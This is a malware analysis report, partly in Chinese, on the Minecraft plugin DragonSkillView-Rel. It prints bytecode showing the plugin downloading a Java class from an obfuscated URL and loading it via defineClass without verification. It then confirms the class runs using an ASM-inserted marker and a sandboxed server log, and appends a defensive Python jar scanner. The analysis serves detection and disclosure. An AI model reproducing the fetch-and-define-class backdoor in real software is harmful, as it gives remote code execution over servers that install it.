5: getfield #61 // Field extends:Ljava/lang/String;
8: invokespecial #78 // Method java/net/URL."":(Ljava/lang/String;)V
11: dup
12: astore_2
13: invokevirtual #82 // Method java/net/URL.openConnection:()Ljava/net/URLConnection;
16: checkcast #84 // class java/net/HttpURLConnection
19: dup
20: ldc #86 // String
22: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
25: getstatic #91 // Field seventeen/artist/rel/skillview/main/SkillViewRel/iIiIiIIIIi.iiIIiiiiIi:Ljava/lang/String;
28: invokevirtual #95 // Method java/net/HttpURLConnection.setRequestProperty:(Ljava/lang/String;Ljava/lang/String;)V
31: invokevirtual #99 // Method java/net/HttpURLConnection.getInputStream:()Ljava/io/InputStream;
34: astore_3
35: new #101 // class java/io/ByteArrayOutputStream
38: dup
39: invokespecial #102 // Method java/io/ByteArrayOutputStream."":()V
42: astore 4
44: sipush 1024
47: newarray byte
49: iconst_1
50: dup
51: pop2
52: astore 5
54: iconst_0
55: istore 6
57: aload_3
58: aload 5
60: invokevirtual #108 // Method java/io/InputStream.read:([B)I
63: dup
64: istore 6
66: iconst_m1
67: if_icmpeq 85
70: aload_3
71: aload 4
73: aload 5
75: iconst_0
76: iload 6
78: invokevirtual #112 // Method java/io/ByteArrayOutputStream.write:([BII)V
81: goto 58
84: athrow
85: aload 4
87: invokevirtual #116 // Method java/io/ByteArrayOutputStream.toByteArray:()[B
90: astore 6
92: aload_0
93: aload_1
94: iconst_0
95: aload 6
97: dup_x1
98: arraylength
99: invokevirtual #120 // Method defineClass:(Ljava/lang/String;[BII)Ljava/lang/Class;
102: astore_3
103: aload_3
104: areturn
105: athrow
106: astore_2
107: aconst_null
108: aload_2
109: invokevirtual #121 // Method java/io/IOException.printStackTrace:()V
112: areturn
Exception table:
from to target type
0 84 106 Class java/io/IOException
85 104 106 Class java/io/IOException
}
复制代码
概括:该文件从网上下载Java类并在没有验证的情况下加载了它
为证明该类确实被使用,对该类进行字节码编辑,插入对io.github.cavenightingale.Anchor.onClassLoaded的调用,程序如下:
package io.github.cavenightingale;
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassWriter;
import org.objectweb.asm.Opcodes;
import org.objectweb.asm.tree.*;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
public class Main {
public static void main(String[] args) {
try (var is = new FileInputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class");
var os = new FileOutputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class.1")) {
ClassReader cr = new ClassReader(is);
ClassNode node = new ClassNode();
cr.accept(node, 0);
for (var x : node.methods) {
if (x instanceof MethodNode mn && mn.name.equals("")) {
mn.instructions.insertBefore(mn.instructions.getFirst(), new MethodInsnNode(Opcodes.INVOKESTATIC, "io/github/cavenightingale/Anchor", "onClassLoaded", "()V"));
}
}
ClassWriter cw = new ClassWriter(0);
node.accept(cw);
os.write(cw.toByteArray());
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}复制代码
package io.github.cavenightingale;
public class Anchor {
public static void onClassLoaded() {
System.out.println("[CaveNightingale] Backdoor loaded!");
}
}复制代码
使用IIiIIiIiiI.class.1替换IIiIIiIiiI.class并进行重新打包,丢进隔离环境运行
Starting org.bukkit.craftbukkit.Main
System Info: Java 17 (OpenJDK 64-Bit Server VM 17.0.7+7-Ubuntu-0ubuntu123.04) Host: Linux 6.2.0-23-generic (amd64)
Loading libraries, please wait...
[14:54:58 INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[14:55:00 INFO]: Loaded 7 recipes
[14:55:00 INFO]: Starting minecraft server version 1.20.1
[14:55:00 INFO]: Loading properties
[14:55:01 INFO]: This server is running Paper version git-Paper-47 (MC: 1.20.1) (Implementing API version 1.20.1-R0.1-SNAPSHOT) (Git: aea9cdd)
[14:55:01 INFO]: Server Ping Player Sample Count: 12
[14:55:01 INFO]: Using 4 threads for Netty based IO
[14:55:01 WARN]: [!] The timings profiler has been enabled but has been scheduled for removal from Paper in the future.
We recommend installing the spark profiler as a replacement: https://spark.lucko.me/
For more information please visit: https://github.com/PaperMC/Paper/issues/8948
[14:55:01 INFO]: [ChunkTaskScheduler] Chunk system is using 1 I/O threads, 4 worker threads, and gen parallelism of 4 threads
[14:55:01 INFO]: Default game type: SURVIVAL
[14:55:01 INFO]: Generating keypair
[14:55:01 INFO]: Starting Minecraft server on *:25565
[14:55:01 INFO]: Using epoll channel type
[14:55:02 INFO]: Paper: Using libdeflate (Linux x86_64) compression from Velocity.
[14:55:02 INFO]: Paper: Using OpenSSL 3.0.x (Linux x86_64) cipher from Velocity.
[14:55:02 WARN]: [org.bukkit.craftbukkit.v1_20_R1.legacy.CraftLegacy] Initializing Legacy Material Support. Unless you have legacy plugins and/or data this is a bug!
[14:55:06 WARN]: Legacy plugin MCCore v1.67 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonCore v2.4.7 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin SkillAPI v3.108 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonSkillView-Rel v2.0.8 does not specify an api-version.
[14:55:06 INFO]: [PlaceholderAPI] Loading server plugin PlaceholderAPI v2.11.3
[14:55:06 INFO]: [MCCore] Loading server plugin MCCore v1.67
[14:55:06 INFO]: [DragonCore] Loading server plugin DragonCore v2.4.7
[14:55:06 INFO]: [SkillAPI] Loading server plugin SkillAPI v3.108
[14:55:06 INFO]: [DragonSkillView-Rel] Loading server plugin DragonSkillView-Rel v2.0.8
[14:55:06 INFO]: Server permissions file permissions.yml is empty, ignoring it
[14:55:06 INFO]: Preparing level "world"
[14:55:07 INFO]: Preparing start region for dimension minecraft:overworld
[14:55:07 INFO]: Time elapsed: 371 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_nether
[14:55:07 INFO]: Time elapsed: 55 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_end
[14:55:07 INFO]: Time elapsed: 59 ms
[14:55:07 INFO]: [PlaceholderAPI] Enabling PlaceholderAPI v2.11.3
[14:55:08 INFO]: [PlaceholderAPI] Fetching available expansion information...
[14:55:08 INFO]: [MCCore] Enabling MCCore v1.67*
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection - is the server using Cauldron/Thermos?
[14:55:08 WARN]: Nag author(s): '[Eniripsa96]' of 'MCCore v1.67' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection for scoreboards - restoring to slow method
[14:55:08 INFO]: [MCCore] Created a new folder for config files
[14:55:08 INFO]: [DragonCore] Enabling DragonCore v2.4.7*
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] 欢迎使用【龙之核心】,插件作者为QQ448780139
[14:55:08 INFO]: [DragonCore] 欢迎加入QQ交流群: 901704037
14:55:08 INFO]: [DragonCore] 欢迎注册社区网站: [https://dragoncore.top/
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] [STDOUT] NMS版本:net.minecraft.server.v1_20_R1
[14:55:08 WARN]: Nag author(s): '[]' of 'DragonCore v2.4.7' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 WARN]: java.lang.ClassNotFoundException: net.minecraft.server.v1_20_R1.ItemStack
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass0(PluginClassLoader.java:183)
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass(PluginClassLoader.java:150)
[14:55:08 WARN]: at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:520)
[14:55:08 WARN]: at java.base/java.lang.Class.forName0(Native Method)
[14:55:08 WARN]: at java.base/java.lang.Class.forName(Class.java:375)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.util.NBTUtils.loadNBTUtils(NBTUtils.java:118)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.DragonCore.onEnable(DragonCore.java:50)
[14:55:08 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:08 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:08 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:08 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:08 INFO]: DragonCore - Starting to load files
[14:55:08 INFO]: ┏━━━━━━━━━ Loading Yml files ━━━━━━━━━
[14:55:08 INFO]: ┃ Loading: WorldTexture.yml
[14:55:08 INFO]: ┃ Loading: SlotConfig.yml
[14:55:09 INFO]: ┃ Loading: KeyConfig.yml
[14:55:09 INFO]: ┃ Loading: ItemModel.yml
[14:55:09 INFO]: ┃ Loading: ItemIcon.yml
[14:55:09 INFO]: ┃ Loading: FontConfig.yml
[14:55:09 INFO]: ┃ Loading: EntityModel.yml
[14:55:09 INFO]: ┃ Loading: config.yml
[14:55:09 INFO]: ┃ Loading: Blood.yml
[14:55:09 INFO]: ┃ Loading: ArmorLayer.yml
[14:55:09 INFO]: ┃ Loading: ItemTip/通用.yml
[14:55:09 INFO]: ┃ Loading: ItemTip/用于显示Gui界面的Tip.yml
[14:55:09 INFO]: ┃ Loading: ItemTip/书本.yml
[14:55:09 INFO]: ┃ Loading: Gui/自动滚动公告.yml
[14:55:09 INFO]: ┃ Loading: Gui/背包.yml
[14:55:09 INFO]: ┃ Loading: Gui/huds.yml
[14:55:09 INFO]: ┖━━━━━━━━━━ File loading complete ━━━━━━━━━━━
[14:55:09 INFO]: Player data storage in YML format enabled
[14:55:09 INFO]: DragonCore - Loading complete
[14:55:09 INFO]: [SkillAPI] Enabling SkillAPI v3.108*
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: Registration complete
[14:55:09 INFO]: - 0 skills
[14:55:09 INFO]: - 0 classes
[14:55:09 WARN]: java.lang.NullPointerException: Cannot invoke "java.lang.Class.getDeclaredField(String)" because "living" is null
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.listener.KillListener.(KillListener.java:68)
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.SkillAPI.onEnable(SkillAPI.java:162)
[14:55:09 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:09 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:09 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:09 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:09 INFO]: [DragonSkillView-Rel] Enabling DragonSkillView-Rel v2.0.8*
[14:55:09 INFO]: [DragonSkillView-Rel] [STDOUT] [CaveNightingale] Backdoor loaded!
[14:55:09 WARN]: Nag author(s): '[17Artist]' of 'DragonSkillView-Rel v2.0.8' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:10 INFO]: ┏━━━━━━━━━ Authentication failed ━━━━━━━━━
[14:55:10 INFO]: ┃ Failure: activation code is incorrect, please check
[14:55:10 INFO]: ┃ Plugin name: 龙之技能栏
[14:55:10 INFO]: ┖━━━━━━━━━━ Authentication failed ━━━━━━━━━━━
[14:55:10 INFO]: [PlaceholderAPI] Placeholder expansion registration initializing...
[14:55:10 INFO]: Running delayed init tasks
[14:55:10 INFO]: 0 placeholder hook(s) registered!
[14:55:10 INFO]: Done (9.372s)! For help, type "help"
[14:55:10 INFO]: Timings Reset
[14:55:13 INFO]: ┏━━━━━━━━━ Authentication failed ━━━━━━━━━
[14:55:13 INFO]: ┃ Failure: verification failed, please check that the activation code is entered correctly.
[14:55:13 INFO]: ┃ Plugin name: 龙之技能栏
[14:55:13 INFO]: ┖━━━━━━━━━━ Authentication failed ━━━━━━━━━━━
>
> stop
[14:55:59 INFO]: Stopping the server
[14:55:59 INFO]: Stopping server
[14:55:59 INFO]: [DragonSkillView-Rel] Disabling DragonSkillView-Rel v2.0.8
[14:55:59 INFO]: [SkillAPI] Disabling SkillAPI v3.108
[14:55:59 INFO]: [DragonCore] Disabling DragonCore v2.4.7
[14:55:59 INFO]: [MCCore] Disabling MCCore v1.67
[14:55:59 INFO]: [PlaceholderAPI] Disabling PlaceholderAPI v2.11.3
[14:55:59 INFO]: Saving players
[14:55:59 INFO]: Saving worlds
[14:55:59 INFO]: Saving chunks for level 'ServerLevel[world]'/minecraft:overworld
[14:55:59 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Halted chunk system for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world'
[14:56:01 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world' in 1.82s
[14:56:01 INFO]: ThreadedAnvilChunkStorage (world): All chunks are saved
[14:56:01 INFO]: Saving chunks for level 'ServerLevel[world_nether]'/minecraft:the_nether
[14:56:01 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_nether'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_nether' in 1.01s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM-1): All chunks are saved
[14:56:02 INFO]: Saving chunks for level 'ServerLevel[world_the_end]'/minecraft:the_end
[14:56:02 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_the_end' in 0.15s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM1): All chunks are saved
[14:56:02 INFO]: ThreadedAnvilChunkStorage: All dimensions are saved
[14:56:02 INFO]: Flushing Chunk IO
[14:56:02 INFO]: Closing Thread Pool
> 2023-06-24 14:56:02,888 Log4j2-AsyncAppenderEventDispatcher-1-Async WARN Advanced terminal features are not available in this environment
[14:56:02 INFO]: Closing Server
This proves that the class really is used at runtime.
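The evidence above was gathered by hand: `grep ClassLoader` over the unpacked jar, `javap -c` on the hit, then a server run to show the class is actually loaded. For triaging other obfuscated plugins the same check is worth having as a repeatable script. The following is an added example, not code from the report or from the plugin it discusses: it parses each `.class` entry's constant pool (JVM spec section 4.4) and flags classes whose superclass is a `ClassLoader` subclass, plus any `Methodref` to `defineClass`, `loadClass` or `findClass`, which is how a loader stub turns decrypted bytes into a class. The sample jar and the class names `a/b/Loader` and `a/b/Plain` are constructed in memory for the demonstration and do not come from the plugin.

```python
"""Static triage of a plugin jar for custom class loaders (added example).

Parses each .class file's constant pool and flags classes that extend a
ClassLoader or reference defineClass/loadClass/findClass.  The sample
class files built below are constructed for offline testing only.
"""
import io
import struct
import zipfile

LOADER_SUPERS = {
    "java/lang/ClassLoader",
    "java/security/SecureClassLoader",
    "java/net/URLClassLoader",
}
LOADER_METHODS = {"defineClass", "loadClass", "findClass"}


def _read_constant_pool(f, count):
    """Return a 1-indexed list of constant pool entries (index 0 unused)."""
    pool = [None] * count
    i = 1
    while i < count:
        tag = f.read(1)[0]
        if tag == 1:                                  # CONSTANT_Utf8
            (length,) = struct.unpack(">H", f.read(2))
            pool[i] = ("Utf8", f.read(length).decode("utf-8", "replace"))
        elif tag in (3, 4):                           # Integer, Float
            f.read(4)
            pool[i] = (tag,)
        elif tag in (5, 6):                           # Long, Double occupy two slots
            f.read(8)
            pool[i] = (tag,)
            i += 1
        elif tag in (7, 8, 16, 19, 20):               # Class, String, MethodType, Module, Package
            (idx,) = struct.unpack(">H", f.read(2))
            pool[i] = ("Class" if tag == 7 else tag, idx)
        elif tag in (9, 10, 11, 12, 17, 18):          # refs, NameAndType, (Invoke)Dynamic
            a, b = struct.unpack(">HH", f.read(4))
            pool[i] = ("Methodref" if tag in (10, 11) else tag, a, b)
        elif tag == 15:                               # MethodHandle
            f.read(3)
            pool[i] = (tag,)
        else:
            raise ValueError(f"unknown constant pool tag {tag}")
        i += 1
    return pool


def analyze_class(data):
    """Parse one class file; report its superclass and loader-related calls."""
    f = io.BytesIO(data)
    magic, _minor, _major, cp_count = struct.unpack(">IHHH", f.read(10))
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    pool = _read_constant_pool(f, cp_count)
    _access, this_idx, super_idx = struct.unpack(">HHH", f.read(6))

    def class_name(idx):                              # CONSTANT_Class -> CONSTANT_Utf8
        return pool[pool[idx][1]][1] if idx else None  # java/lang/Object has super_class 0

    calls = set()
    for entry in pool:
        if entry and entry[0] == "Methodref":
            owner = class_name(entry[1])
            _tag, name_idx, _desc_idx = pool[entry[2]]  # CONSTANT_NameAndType
            method = pool[name_idx][1]
            if method in LOADER_METHODS:
                calls.add(f"{owner}.{method}")
    superclass = class_name(super_idx)
    return {
        "name": class_name(this_idx),
        "super": superclass,
        "loader_calls": sorted(calls),
        "is_classloader": superclass in LOADER_SUPERS,
    }


def scan_jar(jar):
    """Return (entry name, analysis) for every class that looks like a loader."""
    findings = []
    with zipfile.ZipFile(jar) as z:
        for info in z.infolist():
            if not info.filename.endswith(".class"):
                continue
            try:
                result = analyze_class(z.read(info))
            except (ValueError, struct.error, IndexError):
                continue                              # unparseable entry, skip it
            if result["is_classloader"] or result["loader_calls"]:
                findings.append((info.filename, result))
    return findings


def build_sample_class(this_name, super_name, call_define_class):
    """Constructed minimal class file (no fields/methods) for offline testing."""
    pool = []

    def add(raw):
        pool.append(raw)
        return len(pool)                              # 1-based constant index

    utf8 = lambda s: add(b"\x01" + struct.pack(">H", len(s)) + s.encode())
    cls = lambda s: add(b"\x07" + struct.pack(">H", utf8(s)))
    this_idx, super_idx = cls(this_name), cls(super_name)
    if call_define_class:                             # Methodref ClassLoader.defineClass
        owner = cls("java/lang/ClassLoader")
        nat = add(b"\x0c" + struct.pack(">HH", utf8("defineClass"),
                                         utf8("(Ljava/lang/String;[BII)Ljava/lang/Class;")))
        add(b"\x0a" + struct.pack(">HH", owner, nat))
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, len(pool) + 1)
    tail = struct.pack(">HHHHHHH", 0x0021, this_idx, super_idx, 0, 0, 0, 0)
    return header + b"".join(pool) + tail


def build_sample_jar():
    """Constructed in-memory jar: one loader-like class, one plain class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("a/b/Loader.class", build_sample_class("a/b/Loader", "java/lang/ClassLoader", True))
        z.writestr("a/b/Plain.class", build_sample_class("a/b/Plain", "java/lang/Object", False))
        z.writestr("plugin.yml", "name: Sample\n")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_jar()
    for entry, result in scan_jar(target):
        print(entry, "extends", result["super"], "calls", result["loader_calls"])
```

Run it as `python scan_loaders.py DragonSkillView-Rel.jar` to list candidate classes to feed into `javap -c`. It is a static check only: it sees a loader that is declared in the constant pool, and will miss one obtained through reflection, `MethodHandles.Lookup.defineClass`, or `Unsafe`, or a class name assembled at runtime from decrypted strings (as the `IIIIiiIIiI.instanceof` calls in the `javap` output above do). Runtime confirmation of the kind shown in the server log is still needed to prove the class is actually exercised.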